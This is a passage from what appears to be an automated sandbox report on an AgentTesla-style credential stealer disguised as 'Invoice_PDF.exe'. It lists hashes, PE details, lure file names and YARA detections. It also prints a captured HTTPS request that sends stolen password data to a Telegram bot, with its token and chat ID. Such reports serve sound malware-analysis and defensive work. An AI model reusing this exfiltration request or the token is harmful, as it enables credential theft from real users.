                                                                                                • 149.154.167.220
                                                                                                SWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                NOTIFICACION DE CITACION No. 0988-02043-2020. OFICINA DE TALENTO HUMANO.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                WK1CQtJu13.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.W32.AIDetect.malware1.19028.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                support.Client.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                ysNX6q4xm1.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                YXD40hGJU8.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Orden de Compra -AR95647.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL Receipt Document,pdf.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Glory Hack.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                GenshinHack.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                KG236KQE0b.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Gracehealthmi.org7X9YCEB6AI.htmGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                iXVF1Qz1k5.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.log
                                                                                                Process:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.355304211458859
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                Malicious:true
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.900031011690095
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:Invoice_PDF.exe
                                                                                                File size:584704
                                                                                                MD5:1dcc43f272f66d8e5afe11e7276dd122
                                                                                                SHA1:cb6a88d1443e7cca944a4176e2a8ebc205f715e3
                                                                                                SHA256:0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
                                                                                                SHA512:d3b4b4c93a0b1be2b3effe11e1a4db954f65dc9edf722310ee43defa5cecce6f717fc518b9735c71ef4fac53202c3d314ee6e7e0aab789bc881e4eab6e65a111
                                                                                                SSDEEP:12288:iRyDALnKCZh9TgD29MIY9s0cWEq84Xs10/FKVKmyglGETvHrJrEvE:Yp/jTg6Kxs0cABXe0/Fu3/TlEM
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..a..............0.................. ........@.. .......................@............@................................

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x48fe8e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0x619DD327 [Wed Nov 24 05:52:39 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8fe340x57.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x900000x610.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x8de940x8e000False0.927531497579data7.91118342624IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x900000x6100x800False0.33984375data3.45406453385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x920000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_VERSION0x900a00x380data
                                                                                                RT_MANIFEST0x904200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                Translation0x0000 0x04b0
                                                                                                LegalCopyright Real Estate LTD
                                                                                                Assembly Version2.9.0.0
                                                                                                InternalNameOverlappedDa.exe
                                                                                                FileVersion2.8.2.0
                                                                                                CompanyNameBuena Vista Realty Service
                                                                                                LegalTrademarks
                                                                                                Comments
                                                                                                ProductNameObjectHolderList
                                                                                                ProductVersion2.8.2.0
                                                                                                FileDescriptionObjectHolderList
                                                                                                OriginalFilenameOverlappedDa.exe

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 2, 2021 16:56:42.434241056 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.434289932 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.434371948 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.534015894 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.534053087 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.602024078 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.602269888 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.606867075 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.606899023 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.607336044 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.650398970 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.186492920 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.216207981 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.218369961 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.260874033 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.311028957 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.311120033 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.311306000 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.312737942 CET49813443192.168.2.5149.154.167.220

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 2, 2021 16:56:42.256400108 CET5501653192.168.2.58.8.8.8
                                                                                                Dec 2, 2021 16:56:42.275835037 CET53550168.8.8.8192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Dec 2, 2021 16:56:42.256400108 CET192.168.2.58.8.8.80x6c77Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Dec 2, 2021 16:56:42.275835037 CET8.8.8.8192.168.2.50x6c77No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • api.telegram.org

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.549813149.154.167.220443C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-12-02 15:56:44 UTC0OUTPOST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d
                                                                                                Host: api.telegram.org
                                                                                                Content-Length: 1009
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                2021-12-02 15:56:44 UTC0INHTTP/1.1 100 Continue
                                                                                                2021-12-02 15:56:44 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 39 35 32 31 36 31 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 61 6c 66 6f 6e 73 2f 31 32 38 37 35 37 0a 4f 53 46 75 6c
                                                                                                Data Ascii: -----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="chat_id"1952161154-----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/128757OSFul
                                                                                                2021-12-02 15:56:44 UTC1INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Thu, 02 Dec 2021 15:56:44 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 606
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                {"ok":true,"result":{"message_id":442,"from":{"id":1900392974,"is_bot":true,"first_name":"UdLogzx","username":"UdLogzx_bot"},"chat":{"id":1952161154,"first_name":"John","last_name":"ju","type":"private"},"date":1638460604,"document":{"file_name":"user-128757 2021-12-02 07-57-32.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBumGo7LwUeqe_8YHaAhGE1dXH7B9tAAIaEgACKbtIUf8qmO1rIsZlIgQ","file_unique_id":"AgADGhIAAim7SFE","file_size":437},"caption":"New PW Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                Analysis Process: Invoice_PDF.exe PID: 6140 Parent PID: 4684

                                                                                                General

                                                                                                Start time:16:54:43
                                                                                                Start date:02/12/2021
                                                                                                Path:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Invoice_PDF.exe"
                                                                                                Imagebase:0xb90000
                                                                                                File size:584704 bytes
                                                                                                MD5 hash:1DCC43F272F66D8E5AFE11E7276DD122
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Analysis Process: Invoice_PDF.exe PID: 5944 Parent PID: 6140

                                                                                                General

                                                                                                Start time:16:54:52
                                                                                                Start date:02/12/2021
                                                                                                Path:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Imagebase:0xed0000
                                                                                                File size:584704 bytes
                                                                                                MD5 hash:1DCC43F272F66D8E5AFE11E7276DD122
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >